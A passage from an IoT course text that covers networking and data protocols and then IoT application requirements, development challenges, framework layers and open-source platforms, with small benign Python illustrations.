example a computer connected to both a wired local network and a wi-fi network.

2. Classical multihoming
In this type of multihoming, a single network is connected to multiple providers. The edge
router communicates with the providers using dynamic routing protocols, which can
recognize failures and reconfigure routing tables without the hosts being aware of it. It
requires an address space recognized by all providers, hence it is costly.

9.8 IoT IDENTIFICATION AND DATA PROTOCOLS
IoT devices are diverse in their architecture, and their use cases can scale from single device
deployments to massive cross-platform deployments. There are various types of communication
protocols that allow communication between these devices. Some of the protocols are given
below.

IPv4

Internet Protocol version 4 (IPv4) is a network layer protocol used to provide addresses to hosts in a
network. It is a widely used communication protocol for different kinds of networks. It is a
connectionless protocol that makes use of packet switching technology. It gives a 32-bit
address to a host, and its address space is divided into five classes: A, B, C, D, and E. It can
provide only about 4.3 billion addresses, which is not sufficient for the growing number of IoT
devices. It allows data to be encrypted but does not limit access to data hosted on the network.

IPV6

As the total number of addresses provided by IPv4 is not sufficient, especially for IoT devices,
Internet Protocol version 6 (IPv6) was introduced. It is an upgraded version of IPv4. It uses 128
bits to address a host, hence anticipates future growth and provides relief from the shortage of
network addresses. It gives better performance than IPv4. It also ensures privacy and data
integrity. It is automatically configured and has built-in support for authentication. Some of the
differences between IPv4 and IPv6 are shown in Table 2.

Table 2. Differences between IPv4 and IPv6

IPv4 IPv6

Its length is 32 bits Its length is 128 bits

Possible number of addresses is 2^32 Possible number of addresses is 2^128

It is represented in dotted decimal notation It is represented in hexadecimal notation

IPsec is optional IPsec is compulsory

It supports manual or DHCP configuration It supports auto-configuration

It supports broadcasting It supports multicasting

MQTT

Message Queuing Telemetry Transport (MQTT) is a widely used lightweight messaging protocol
based on the publish-subscribe model. It is used in conjunction with the TCP/IP protocol and is
designed for battery powered devices. Its model is based on three entities: subscriber, publisher
and broker. Publishers are typically lightweight sensors, and subscribers are applications that
receive data from the publishers. Subscribers need to subscribe to a topic; messages published on
a topic are distributed by the broker. The publisher collects the data and sends it to the subscribers
through the broker. The broker, after receiving, filtering and making decisions on messages,
forwards them to the subscribers. Brokers also ensure security by authorizing subscribers and
publishers. Fig 5 shows the working of MQTT.

Fig 5: Working of MQTT
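
The hedged sketch below illustrates this publish/subscribe flow using the paho-mqtt client library (written against the paho-mqtt 1.x API; version 2.x additionally takes a callback-API-version argument in Client()). The broker address and topic name are placeholders, not values from the text.

# Hedged sketch of MQTT publish/subscribe using the paho-mqtt client library.
# Broker and topic are placeholders for illustration.
import time
import paho.mqtt.client as mqtt

BROKER = "broker.example.org"                 # hypothetical MQTT broker
TOPIC = "home/livingroom/temperature"

def on_message(client, userdata, message):
    # Called by the network loop whenever the broker delivers a message
    print(f"{message.topic}: {message.payload.decode()}")

subscriber = mqtt.Client()
subscriber.on_message = on_message
subscriber.connect(BROKER, 1883)
subscriber.subscribe(TOPIC)
subscriber.loop_start()                       # handle network traffic in the background

publisher = mqtt.Client()
publisher.connect(BROKER, 1883)
publisher.publish(TOPIC, "22.5")              # the sensor reading is the payload
time.sleep(2)                                 # allow time for delivery
subscriber.loop_stop()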

CoAP

Constrained Application Protocol (CoAP) is a web transfer protocol used to translate the HTTP
model so that it can be used with constrained devices and network environments. It is intended
for low powered devices and allows low power sensors to interact with RESTful services. It
makes use of UDP for establishing communication between endpoints. It allows data to be
transmitted to multiple hosts using low bandwidth.
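
As a hedged illustration (assuming the aiocoap Python library and a hypothetical CoAP server exposing the resource shown), a RESTful GET request over CoAP might look like the sketch below.

# Hedged sketch of a CoAP GET request using the aiocoap library.
# The resource URI is a placeholder; a CoAP server would have to expose it.
import asyncio
from aiocoap import Context, Message, GET

async def main():
    protocol = await Context.create_client_context()        # client endpoint over UDP
    request = Message(code=GET, uri="coap://sensor.example.org/temperature")
    response = await protocol.request(request).response     # await the server's reply
    print("Response code:", response.code)
    print("Payload:", response.payload.decode())

asyncio.run(main())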

XMPP

Extensible messaging and presence protocol (XMPP) enables real time exchange of extensible
data between network entities. It is a communication protocol based on XML i.e. extensible
markup language. It is an open standard hence anyone can implement these services. It also
supports M2M communication across a variety of networks. It can be used for instant
messaging, multi-party chat, video calls, etc.

AMQP

Advanced Message Queuing Protocol (AMQP) is an application layer, message-oriented
protocol. It is an open standard, efficient, multi-channel, portable and secure. It is fast and also
guarantees delivery along with acknowledgement of received messages. It can be used for both
point-to-point and publish-subscribe messaging. It is used for messaging in client-server
environments. It also supports multi-client environments and helps servers handle requests
faster.


9.9 CONNECTIVITY TECHNOLOGIES

IoT devices need to be connected in order to work. Various technologies used to establish
connections between devices are discussed in this section.

IEEE 802.15.4

It is an IEEE standard protocol used to establish wireless personal area networks (WPAN). It is
used for providing low cost, low speed, ubiquitous networks between devices. It is also known as
Low-Rate wireless Personal Area Network (LR-WPAN) standard. It makes use of the first two
layers (Physical and MAC layers) of the network stack and operates in ISM band. These
standards are also used with communication protocols of higher levels like- ZigBee, 6LoWPAN,
etc.

6LoWPAN

IPv6 over Low-power Wireless Personal Area Network (6LoWPAN) is a standard for wireless
communication. It was the first standard created for IoT. It allows small, low power IoT devices
with limited processing capabilities to have direct connectivity with IP-based servers on the
internet. It also allows IPv6 packets to be transmitted over an IEEE 802.15.4 wireless network.

ZigBee

It is a wireless technology based on IEEE 802.15.4 used to address needs of low-power and low-
cost IoT devices. It is used to create low cost, low power, low data rate wireless ad-hoc
networks. It is resistant to unauthorized reading and communication errors but provides low
throughput. It is easy to install, implement and supports a large number of nodes to be connected.
It can be used for short range communications only.

NFC

Near Field Communication (NFC) is a protocol used for short distance communication between
devices. It is based on RFID technology but has a lower transmission range (of about 10 cm). It
is used for identification of documents or objects. It allows contactless transmission of data. It
has a shorter setup time than Bluetooth and provides better security.

Bluetooth

It is one of the widely used types of wireless PAN used for short range transmission of data. It
makes use of short range radio frequency, provides a data rate of approximately 2.1 Mbps and
operates at 2.45 GHz. It is capable of low cost and low power transmission over short distances.
Its initial version 1.0 supported speeds of up to 732 kbps. Its latest version is 5.2, which can
work up to a 400 m range with a 2 Mbps data rate.

Z-Wave

It is one of the standards available for wireless networks. It is interoperable and uses low
powered radio frequency communication. It is used for connecting to smart devices while
consuming low power. Z-Wave devices allow IoT devices to be controlled over the internet. It
is generally used for applications like home automation. It supports data rates of up to 100 kbps
and also supports encryption and multi-channel operation.

RFID

Radio Frequency Identification (RFID) devices are electronic devices consisting of an antenna
and a small chip. The chip is generally capable of carrying up to 2000 bytes of data. It is used to
give a unique identification to an object. An RFID system is composed of a reading device and
RFID tags. RFID tags are used to store data and identification information, and are attached to
the object to be tracked. The reader is used to detect the presence of an RFID tag when the
object passes through it.

Check your Progress 2

1. What is a gateway prefix? Why is it needed?


2. State differences between IPv4 and IPv6.
3. Explain any three connectivity technologies.


9.10 SUMMARY
In this unit, M2M and IoT technologies are discussed in detail. Machine-to-Machine is a
technology that allows connectivity between networking devices. IoT technology expands the
concept of M2M by creating large networks of devices in which devices communicate with one
another through cloud networking platforms. In order to implement IoT, the components involved
are sensors, the network, analytics and actions (actuators). Some of the existing IoT identification
and data protocols are IPv4, IPv6, MQTT, XMPP, etc. Existing connectivity technologies used
for connecting devices are Bluetooth, ZigBee, IEEE 802.15.4, RFID, etc.

References

1. Dr. Jeeva Jose, “Internet of Things”, 2018, Khanna Book Publishing Co. (P) Ltd. ISBN:
978-93-86173-59-1.

Solutions to Check your Progress 1

1. IoT is a network of physical objects, called "Things", embedded with hardware such as
sensors or actuators and software, for exchanging data with other devices over the internet.
With the help of this technology, it is possible to connect any kind of device, including simple
household objects such as kitchen appliances, baby monitors, ACs, TVs, etc.

2. The various differences between IoT and M2M are –

M2M (Machine 2 Machine)    IoT (Internet of Things)

Point to point connection establishment    Devices are connected through the network and also support connecting to global cloud networks

Limited amount of intelligence    Decision making is enabled

Makes use of traditional communication protocols    Makes use of internet protocols like HTTP, FTP, etc.

Generally may not rely on internet connection    Generally relies on internet connection

Less scalable    Highly scalable

3. The components involved in the implementation of IoT are –


a) Sensors - devices that are capable of collecting data from the environment. There are
various types of sensors available –temperature sensors, pressure sensors, RFID tags,
light intensity detectors, electromagnetic sensors, etc.
b) Network - Data collected from sensors are passed over the network for computations
to the cloud or processing nodes.
c) Analytics - The process of generating useful insights from the data collected by
sensors is called analytics.

d) Action - Information obtained after analytics must be either passed to the user using
some user interface, messages, alerts, etc., or may also trigger some actions with the
help of actuators.

Solutions to Check your Progress 2

1. Gateways connect IoT LANs and WANs together. It is responsible for forwarding
packets between them on the IP layer. Since a large number of devices are connected,
address space needs to be conserved. Each connected device needs a unique address. IP
addresses allocated to devices within a gateway's jurisdiction are valid only in its domain.
Same addresses may be allocated in another gateway’s domain. Hence to maintain
uniqueness, each gateway is assigned a unique network prefix. It is used for global
identification of gateways.

2. Both IPv4 and IPv6 are network layer protocols. Some of the differences are –

IPv4    IPv6

Its length is 32 bits    Its length is 128 bits

Possible number of addresses is 2^32    Possible number of addresses is 2^128

It is represented in dotted decimal notation    It is represented in hexadecimal notation

IPsec is optional    IPsec is compulsory

It supports manual or DHCP configuration    It supports auto-configuration
3. Various connectivity technologies are –

a) IEEE 802.15.4 - It is an IEEE standard protocol used to establish wireless personal
area networks (WPAN). It is used for providing low cost, low speed, ubiquitous
networks between devices.
b) 6LoWPAN - IPv6 over low power wireless personal area network, is a standard for
wireless communication. It was the first standard created for IoT. It allows small,
low power IoT devices with limited processing capabilities to have direct connectivity
with IP based servers on the internet.
c) RFID - Radio frequency identification (RFID) devices are electronic devices consisting
of an antenna and a small chip. This chip is generally capable of carrying up to 2000
bytes of data. It is used to give a unique identification to an object.

UNIT 10 IoT APPLICATION DEVELOPMENT
Structure

10.0 Introduction
10.1 Objectives
10.2 IoT Application Essential Requirements
10.3 Challenges in IoT Application Development
10.4 IoT Application Development Framework
10.5 Open Source IoT Platforms
10.5.1 Popular Open Source IoT Platforms
10.5.2 Some Tools for Building IoT Prototypes
10.6 IoT Application Testing Strategies
10.6.1 Performance Testing
10.6.2 Security Testing
10.6.3 Compatibility Testing
10.6.4 End-User Application Testing
10.6.5 Device Interoperability Testing
10.7 Security Issues in IoT
10.7.1 Counter Measures
10.8 Summary
10.9 Solutions/Answers
10.10 Further Readings

10.0 INTRODUCTION

In the earlier unit, we had studied various IoT networking and connectivity
technologies. After going through the basics of IoT in previous units, we will
concentrate on IoT Application Development in this unit.

When you are developing an application, a platform is what allows you
to deploy and run that application. A platform could be a hardware plus
software suite upon which other applications can operate. A platform could
comprise hardware above which an operating system resides. This operating
system allows applications to run above it by providing the necessary
execution environment.

IoT application platforms provide a comprehensive set of generic, i.e.
application independent, functionalities which can be used to build IoT
applications. When there is only one communication link between devices of
one type and another device of the same type, a system offering a specific service
can be set up. But in the case of communication among devices of multiple types,
there is a need for some common standard application platform which hides the
heterogeneity of the various devices by providing a common working environment
for them.

An IoT application platform is a virtual solution, meaning it resides in the cloud.
Data is the entity that drives business intelligence, and data is what every device
has to exchange with other devices. By means of cloud connectivity, an IoT
application platform translates such device data into useful information. It thus
provides users the means to implement business use cases and enables predictive
maintenance, pay-per-use, analytics and real time data management. In this way,
IoT application platforms provide a complete suite from application development
to deployment and maintenance.

In this unit we will focus on IoT application requirements, challenges of IoT
application development, IoT application development frameworks, open
source platforms for developing IoT applications, tools for designing and
developing IoT application prototypes, and IoT application testing strategies;
towards the end we will study the security issues in IoT systems.

10.1 OBJECTIVES

After going through this unit, you shall be able to:

 understand various requirements for IoT application development;


 list and describe various challenges of IoT application development;
 describe the application development frameworks;
 discuss various types of tools and open source IoT development
platforms
 elucidate the testing strategies to be followed for IoT system testing;
and
 explain security issues in IoT systems.

10.2 IoT APPLICATION ESSENTIAL REQUIREMENTS

The nature of the technology architecture contributes to the essential
requirements of IoT applications. Based on the characteristics of the IoT
technology ecosystem such as heterogeneity, enormous scale, high volume of
data and dynamism, a set of essential requirements for IoT applications is
described. These requirements combined with quality attributes can be used to
develop a set of high-level requirements for IoT applications. The list is not
exhaustive but includes the vitally essential requirements.

10.2.1 Adaptability

IoT systems will consist of several nodes which are resource constrained,
mobile and wirelessly connected to the Internet. Due to factors such as poor
connectivity and power shortage, nodes can be connected to and disconnected
from the system arbitrarily. Furthermore, the state, location and computing
speed of these nodes can change dynamically. All these factors can make IoT
systems extremely dynamic. In such a highly dynamic physical environment,
an IoT application needs to be self-adaptive in order to manage the
communication between the nodes and the services using them. IoT
applications need to be designed and developed in a way that they can
efficiently and effectively react, in a timely manner, to the continuously
changing context in accordance with, for instance, business policies or
performance objectives defined by humans. IoT applications should be
self-optimizing, self-protecting, self-configuring, resilient and energy-efficient.
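
A minimal sketch of one such self-adaptive behaviour, written in Python, is given below: a node keeps retrying a flaky network connection with an exponentially growing wait. The connect() function here is a hypothetical placeholder for whatever link-setup call the device actually uses.

import random
import time

def connect_with_backoff(connect, max_delay=60):
    """Keep retrying a flaky connection, doubling the wait after each failure."""
    delay = 1
    while True:
        try:
            return connect()                      # succeeds once the link is back
        except ConnectionError:
            # Sleep with a little jitter so many nodes do not retry in lock-step.
            time.sleep(delay + random.uniform(0, 1))
            delay = min(delay * 2, max_delay)     # exponential backoff, capped

Capping the delay and adding jitter keeps a large fleet of nodes from overloading the network the moment connectivity returns.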

10.2.2 Intelligence

Intelligent things and system of systems are the building blocks of IoT. IoT
applications will power IoT enabling technologies in transforming everyday
objects into smart objects that can understand and obtain intelligence by
making or enabling context-related decisions, resulting in the execution of
tasks independently without human intervention. Achieving this requires IoT
application to be designed and developed with intelligent decision-making
techniques such as context-aware computing service, predictive analytics,
complex event processing and behavioural analytics.

10.2.3 Real time

A number of IoT domains require the timely delivery of data and services. For
instance, consider IoT in scenarios such as telemedicine, patient care and
vehicle-to-vehicle communications where a delay in seconds can have
dangerous consequences. Environments, where operations are time-critical,
will require IoT applications that provide on-time delivery of data and services.

10.2.4 Security

Privacy, trust, confidentiality and integrity are considered important security


principles for IoT due to the large number of devices, services and people
connected to the Internet. These principles are the top priority and essential
requirements for IoT applications. Since an IoT application uses data in
various forms, at various speeds and from a variety of sources, it is important that it
incorporates trust mechanisms that enforce privacy and confidentiality. In
addition, IoT application must integrate mechanisms to check for the integrity
of data to avoid the erroneous operation of IoT applications.

10.2.5 Regulation Compliant

IoT applications may collect sensitive personal information about people's


daily activities such as detailed household energy usage profile and travel
history. Many people consider this information as confidential. When such
information is exposed to the Internet, there is a possibility of privacy leakage,
and this could affect the privacy of the individual. In order not to violate the
privacy of people, IoT applications must be compliant with the privacy
requirements established by law such as data protection rules, otherwise, they
could be prohibited.
10.3 CHALLENGES IN IoT APPLICATION DEVELOPMENT

The IoT application requirements described previously, combined with the
inherent qualities of the IoT technology infrastructure, make the development
of IoT applications a non-trivial task. These characteristics create a set of
challenges for IoT application stakeholders, as discussed below.

10.3.1 Inherently distributed

IoT applications are typically distributed across several component systems.


Basically, some IoT application components will be implemented in the
cloud/fog. While functionalities such as real-time analysis and data acquisition
are implemented in the IoT device, the application components that allow the
end users to interact with the IoT system will be implemented, usually as a
separate web, mobile or standalone application. IoT applications may also be
distributed over a wide and varying geographical area. As they are distributed,
the classical approach of a centralised development methodology dealing with
all these software components may no longer be applicable. In addition,
designing and implementing distributed applications capable of taking
consistent decisions from non-centralised resources is not always an easy task.

10.3.2 Deep Heterogeneity

One of the major challenges in the realisation of IoT applications is the


interoperability among IoT devices using a variety of technologies. IoT
applications involve interactions among heterogeneous devices, providing and
consuming services deployed in a heterogeneous network (such as fixed,
wireless and mobile). This heterogeneity emanates not only from the difference
in features and capabilities but also for other reasons such as the
manufacturer's and vendors' products and quality of service requirements since
they do not always follow the same standards and protocols. Device and
communication heterogeneity can make the portability of IoT applications
difficult to achieve.

10.3.3 Data Management

The data generated from these heterogeneous devices are generally in huge
volume, in various forms, and are generated at different speeds. IoT
applications will often make critical decisions based on the data collected and
processed. Sometimes, these data can be corrupted for various reasons such as
the failure of a sensor, introduction of an invalid data by a malicious user,
delay in data delivery and wrong data format. Consequently, IoT application
developers are faced with the challenge of developing methods that establish
the presence of invalid data and new techniques that capture the relationship
between the data collected and the decision to be made.
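
As an illustration of the first part of this challenge, the small Python sketch below rejects readings that are incomplete or physically implausible before they reach any decision logic. The field names and the temperature range are illustrative assumptions, not part of any standard.

def is_valid_reading(reading):
    """Reject readings that are incomplete or physically implausible."""
    required = {"device_id", "timestamp", "temperature_c"}
    if not required.issubset(reading):
        return False                               # wrong or incomplete data format
    if not (-40.0 <= reading["temperature_c"] <= 85.0):
        return False                               # outside the sensor's rated range
    return True

print(is_valid_reading({"device_id": "n1", "timestamp": 1700000000, "temperature_c": 23.5}))  # True
print(is_valid_reading({"device_id": "n1", "temperature_c": 900.0}))                          # False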
10.3.4 Application Maintenance

IoT applications will be executed on distributed systems consisting of millions


of devices interacting in rich and complex ways. Since IoT applications will be
distributed over a wide geographical area, there are concerns relating to the
feasibility of application deployment that supports corrective and adaptive
maintenance. The codes running on these devices will have to be debugged and
updated regularly. However, maintenance operations present a number of
challenges. Allowing devices to support remote debugging and application
updates poses significant privacy and security challenges. In addition,
interactive debugging may be difficult due to the limited bandwidth of these
devices.

10.3.5 Humans in the Loop

Many IoT applications are human-centric applications, i.e. humans and objects
will work in synergy. However, the dependencies and interactions between
humans and objects are yet to be fully harmonized. Humans in the loop have
their advantages. For example, in healthcare, incorporating models of various
human activities and assisted technologies in the homes of the elderly can
improve their medical conditions. However, IoT applications that model
human behavior is a significant challenge, as it requires modeling of complex
behavioral, psychological and physiological aspects of human nature. New
research is necessary to incorporate human behaviors in IoT application design
and to understand the underlying requirements and complex dependencies
between IoT applications and humans.

10.3.6 Application Inter-dependency

An inter-dependency problem may arise when several IoT applications share


services from real-world objects. Consider two IoT applications running
concurrently in a home: an energy management application for regulating the
energy consumption of the electrical and electronic appliances and a health-
care application for monitoring the vital signs of the occupants of the house.
To reduce the cost of deployment and channel contention, these applications
share the information from the sensors in the home. However, integrating both
applications is challenging since each application has its own assumptions
about the real world and may have no knowledge of how the other application
works. For example, the home health care application may detect depression
and decide to turn ON all the lights. On the other hand, the energy
management application may decide to turn OFF lights when no motion is
detected. Detecting and resolving such dependency problems is important for
the correctness of operation of interacting IoT systems.

10.3.7 Multiple Stakeholders concern

The development of IoT applications involves various stakeholders with


different and sometimes conflicting concerns and expectations. The
stakeholders of IoT application development include domain expert, software
designer, application developer, device developer and network manager. These
stakeholders have to address issues that are attributed to the life-cycle phases
of an IoT application such as design, implementation, deployment and
evolution. The lack of mechanisms to address the concerns of the various
stakeholders and the special skill and expertise required by the stakeholders to
identify components and to understand the system contributes to the challenges
facing IoT application development.

10.3.8 Quality evaluation

Since IoT applications are currently being integrated into the daily activities of
our lives and sometimes used in critical situations with little or no tolerance for
errors and failures, it therefore means that the overall system quality is
important and must be thoroughly evaluated to guarantee that it is of high
quality before being deployed. However, evaluating quality attributes such as
performance is a key challenge since it depends on the performance of many
components as well as the performance of the underlying technologies.

10.4 IoT APPLICATION DEVELOPMENT FRAMEWORK

Having studied the IoT application development requirements and challenges,
let us focus on the layered approach of the IoT application development
framework in this section.

IoT devices are becoming an integral part of organizations, homes, offices,


factories, hospitals, and almost everywhere. Today there are billions of IoT
devices that are using embedded systems, such as sensors, processors,
communication hardware, and other equipment, to send, collect, and act on
data without much human intervention. However, IoT is not a simple
technology. It is an amalgam of different technologies that work together in
harmony. IoT frameworks have a crucial role in the smooth operation of IoT
devices.

The fundamental components of the IoT framework, as shown in Figure 1,
comprise Device Hardware (sensors, controllers, micro-controllers and other
hardware devices), Device Software (applications written to configure
controllers, operate them remotely and more), Communications/Connectivity
(communication and connectivity mechanisms and protocols), the Cloud
Platform and Cloud Applications, whose details are given below:


Figure 1: Framework for IoT Application Development

10.4.1 Device Hardware

Device Hardware is the first layer of the IoT technology stack and defines the
digital and physical parts of any smart connected product. At this layer it is
imperative to understand the implications of size, deployment, cost, useful
lifetime, reliability and so on. For small devices such as smartwatches, you may
have room only for a System on a Chip (SoC), whereas larger devices can be
built around an embedded computer like a Raspberry Pi, Artik module or
BeagleBone board.

10.4.2 Device Software

The device software is the component that turns the device hardware into a
“smart device.” Device software is the second layer of the IoT technology
stack. Device software enables the concept of “software-defined hardware,”
meaning that a particular hardware device can serve multiple applications
depending on the embedded software it is running. It allows you to implement
communication with the Cloud or other local devices. You can perform real-
time analytics, data acquisition from your device’s sensors, and even control.

This layer of the IoT technology stack is critical because it serves as the glue
between the real world (hardware) and your Cloud Applications. You can also
use device software to reduce the risks of hardware development. Building
hardware is expensive, and it takes a lot longer than software. Instead of
building your device for a narrow and specific purpose, it is better to use the
generic hardware that can be customized by your device software to give you
more flexibility down the road. This technique is often known as “software-
defined hardware.” This way, you can update your embedded software
remotely via the Cloud, which will update your “hardware” functionality in the
field.

The device software layer can be divided into two categories, i.e. the Device
Operating System and Device Applications.

10.4.2.1 Device Operating system

The overall complexity of your IoT solution determines the type of operating
system you need. Key considerations include whether your application requires
a real-time operating system, I/O support, and support for the full TCP/IP
stack. Some examples of embedded operating systems are Brillo, Linux,
Windows Embedded and VxWorks.

10.4.2.2 Device Applications

Device applications run on top of the Edge OS and provide the specific
functionality for your IoT solution. Here the possibilities are endless. You can
focus on data acquisition and streaming to the Cloud, analytics, local control,
etc.

10.4.3 Communications /Connectivity

Communications refer to all the different ways your device will exchange
information with the rest of the world. Communications are the third layer of
the IoT technology stack. Depending on your industry, some people refer to
this layer of the IoT technology stack as connectivity. Communications include
both physical networks and the protocols you will use. It is true that the
implementation of the communications layer is found in the device hardware
and device software. But from a conceptual model, selecting the right
communication mechanisms is a critical part of your IoT product strategy. It
will determine not only how you get data in and out from the Cloud (for
example, using Wi-Fi, WAN, LAN, 4G, 5G, LoRA, etc.), but also, how you
communicate with third-party devices too.

In the connectivity part of the IoT technology stack, it is important to define
the network communication platforms that connect the sensors on the product
hardware to the cloud and then to the application. The communication part at
this stage refers to all the diverse ways in which your device will exchange
information with the outside world, including the physical networks and the
types of protocols you will be using. These communication mechanisms are
implemented in the device hardware and device software. Some of the
communication protocols are -

 Infrastructure (ex: 6LowPAN, IPv4/IPv6, RPL)


 Identification (ex: EPC, uCode, IPv6, URIs)
 Comms / Transport (ex: Wifi, Bluetooth, LPWAN)
 Discovery (ex: Physical Web, mDNS, DNS-SD)
 Data Protocols (ex: MQTT, CoAP, AMQP, Websocket, Node)
 Device Management (ex: TR-069, OMA-DM)
 Semantic (ex: JSON-LD, Web Thing Model)
 Multi-layer Frameworks (ex: Alljoyn, IoTivity, Weave, Homekit)
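
As a concrete illustration of one of the data protocols listed above, the sketch below publishes a single sensor reading over MQTT in Python, assuming the Eclipse paho-mqtt library (1.x client API). The broker host and topic name are illustrative assumptions, not fixed values.

import json
import paho.mqtt.client as mqtt

client = mqtt.Client()                             # paho-mqtt 1.x style constructor
client.connect("broker.example.com", 1883)         # assumed broker host and default MQTT port

payload = json.dumps({"device_id": "sensor-01", "temperature_c": 22.4})
client.publish("home/livingroom/temperature", payload, qos=1)
client.disconnect()

MQTT's publish/subscribe model is popular on constrained devices because its protocol overhead is small and the broker decouples data producers from consumers.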

10.4.4 Cloud Platform

The cloud platform is the backbone of your IoT solution. If you are familiar
with managing SaaS offerings, then you are well aware of the role of this layer
of the IoT technology stack. A cloud platform provides the infrastructure that
supports the critical areas like data collection and management, analytics and
cloud APIs.

10.4.4.1 Data Collection

This is an important aspect. Your smart devices will stream information to the
Cloud. As you define the requirements of your solution, you need to have a
good idea of the type and amount of data you will be collecting on a daily,
monthly and yearly basis. One of the challenges of IoT applications is that they
can generate an enormous amount of data. You need to make sure you define
your scalability parameters so that your architects can determine the right data
management solution from the very beginning.
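
One common way to keep the collected data volume manageable is to summarise readings on the device or gateway before uploading. The Python sketch below is a minimal illustration; read_sensor() and upload() are placeholders for the real sensor driver and transport, and the sampling rate and batch size are assumptions.

import time

def collect_and_summarise(read_sensor, upload, batch_size=60):
    """Buffer raw readings locally and upload only a periodic summary."""
    buffer = []
    while True:
        buffer.append(read_sensor())
        if len(buffer) >= batch_size:
            summary = {
                "count": len(buffer),
                "min": min(buffer),
                "max": max(buffer),
                "mean": sum(buffer) / len(buffer),
            }
            upload(summary)                        # one summary record instead of 60 raw ones
            buffer.clear()
        time.sleep(1)                              # assumed 1 Hz sampling rate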

10.4.4.2 Analytics

Analytics is one of the critical components of an IoT solution. It refers to the
ability to find patterns, crunch data, perform forecasts, integrate machine
learning and more. It has the capability to find out the insights from your data
that will make your solution valuable. Analytics can be as simple as data
aggregation and display or can be as elaborate as using machine learning or
artificial intelligence.
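
A minimal example of the simple end of that spectrum is the rolling-statistics anomaly check sketched below in Python, using only the standard library. The window size and the three-sigma threshold are illustrative assumptions.

from collections import deque
from statistics import mean, stdev

window = deque(maxlen=30)                          # keep only the last 30 readings

def is_anomaly(value, threshold=3.0):
    """Flag a reading that deviates strongly from the recent rolling mean."""
    if len(window) >= 10:                          # need some history before judging
        m, s = mean(window), stdev(window)
        if s > 0 and abs(value - m) > threshold * s:
            return True
    window.append(value)
    return False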

10.4.4.3 Cloud APIs

The Internet of Things is all about connecting devices and sharing data, which
you can achieve by exposing APIs at either the Cloud level or the device level.
Cloud APIs allow your customers and partners to either interact with your
devices or to exchange data. Remember that opening an API is not a technical
decision; it’s a business decision.
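
A minimal sketch of such a cloud API, assuming the Flask micro-framework, is shown below. The route, device identifier and data are illustrative; a real deployment would add authentication, rate limiting and a proper datastore.

from flask import Flask, jsonify

app = Flask(__name__)

# In-memory stand-in for the data collected from devices.
latest = {"sensor-01": {"temperature_c": 22.4, "updated": "2023-01-01T10:00:00Z"}}

@app.route("/api/v1/devices/<device_id>/latest")
def latest_reading(device_id):
    if device_id not in latest:
        return jsonify({"error": "unknown device"}), 404
    return jsonify(latest[device_id])

if __name__ == "__main__":
    app.run(port=8080)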

10.4.5 Cloud Applications

The fifth layer of the IoT technology stack is the Cloud Applications layer.
Your end-user applications are the part of the system that your customers will
see and interact with. These applications will most likely be web-based, and
depending on your user needs, you might need separate apps for desktop,
mobile, and even wearables. Even though a smart device has its own display,
the user may likely use a cloud application as their main point of interaction
with your solution. This allows them to have access to your smart devices
anytime and anywhere, which is part of the goal of having connected devices.
While designing end-user applications, it is very important to understand who
your user is and what is his/her primary goal of using the product. The other
consideration is that for Industrial IoT (IIoT) applications, you’ll probably
have more than one user.

Applications can also be divided into customer-facing versus internal apps.


Customer-facing applications usually get the most attention, but in the case of
IoT, internal applications are equally important. These include applications to
remotely provision and troubleshoot devices, monitor the health of your device
fleet, report on performance and predictive maintenance, etc.

These internal apps will require a deep understanding of your external and
internal customers and will require the right prioritization and resourcing.

In the next section let us study open source platforms and some prototype tools
available for IoT Application Development.

10.5 OPEN SOURCE IoT PLATFORMS

To understand the need for an open-source IoT platform, consider the
following three points:

(i) Each consumer desires to utilize any IoT device of their preference
without being restricted or bound to a specific product vendor. For
example, some smart devices can only be paired with smartphones
from the same retailer.
(ii) All companies producing IoT devices desire to integrate their
particular devices easily with diverse ecosystems.
(iii) All application developers desire their apps to support multiple IoT
devices without having to blend in specially developed vendor-specific
code.

The open-source framework is a one-stop solution to the above constraints, and


it enables scalability and superior levels of flexibility. Many open-source IoT
frameworks can be downloaded for free and installed quite straightforwardly
across your applications.

10.5.1 Popular Open Source IoT Platforms

Following are some of the popular Open Source IoT platforms:

Kaa

Kaa IoT Platform is one the most efficient and rich open-source Internet of
Things cloud platforms where anyone has a free way to materialize their smart
product concepts. On this platform, you can manage an unlimited number of
connected devices with cross-device interoperability.

You can achieve real-time device monitoring with the possibility of remote
device provisioning and configuration. It is one of the most flexible IoT
platforms for your business which is fast, scalable, and modern.

Macchina.io

The Macchina.io platform provides a web-enabled, modular, and extensible
JavaScript and C++ runtime environment for developing IoT gateway
applications. It also supports a wide variety of sensors and connection
technologies including Tinkerforge bricklets, XBee, accelerometers and many
others. This platform can be used to develop and deploy device software
for automotive telematics and V2X, building and home automation, industrial
edge computing and IoT gateways, smart sensors, or energy management
systems.

Zetta

Zetta is a server-oriented platform that has been built around NodeJS, REST,
and a flow-based reactive programming development philosophy linked with
the Siren hypermedia APIs. They are connected with cloud services after being
abstracted as REST APIs. People believe that the Node.js platform is best to
develop IoT frameworks. These cloud services include visualization tools and
support for machine analytics tools like Splunk. It creates a zero-distributed
network by connecting endpoints such as Linux and Arduino hacker boards
with platforms such as Heroku. Key features are:

 Runs everywhere, including cloud, PCs, or single-board computers.


 Can turn any device into an API.
 Create geo-distributed networks by linking PCs, BeagleBones, and
Raspberry Pis with cloud platforms, such as Heroku.
 Optimized to stream real-time, data-intensive applications.
 Supports almost all device protocols.

DeviceHive

It is yet another feature-rich open-source IoT platform that is currently


distributed under the Apache 2.0 license and is free to use and change. It
provides Docker and Kubernetes deployment options and can be downloaded
and used with both public and private clouds. It allows you to run batch analytics
and machine learning on top of your device data and more. Various libraries,
including Android and iOS libraries, are supported in DeviceHive. Key
features are:

 Compatible with Java, Python, Node.js, iOS, Android, and other


libraries.
 Usable with public, private, or hybrid cloud networking.
 Connects devices via HTTP, WebSockets, or MQTT.
 Offers few deployment options, i.e., Docker, Docker Compose, and
Kubernetes.
 Provides rich support for big data analytics.

Distributed Services Architecture (DSA)

DSA is an open-source IoT platform that unifies separate devices, services, and
applications in a structured, real-time data model and facilitates decentralized
device inter-communication, logic, and applications. Distributed service links
are a community library that allows protocol translation and data integration
to and from third-party data sources. All these modules are lightweight,
making them flexible in use. It implements a DSA query DSL and has inbuilt
hardware integration support.

Google Cloud Platform

Developers can code, test and deploy their applications with highly scalable
and reliable infrastructure that is provided by Google and Google itself uses it.
Developers have to just pay attention to the code and Google handles issues
regarding infrastructure, computing power and data storage facility.

Google is one of the popular IoT platforms because of its fast global network,
Google's BigData tools, pay-as-you-use pricing, and support for various
available cloud services like RiptideIO, BigQuery, Firebase, PubSub, Telit
Wireless Solutions, connecting Arduino with Firebase, Cassandra on Google
Cloud Platform, and many more.

10.5.2 Some Tools for Building IoT Prototypes
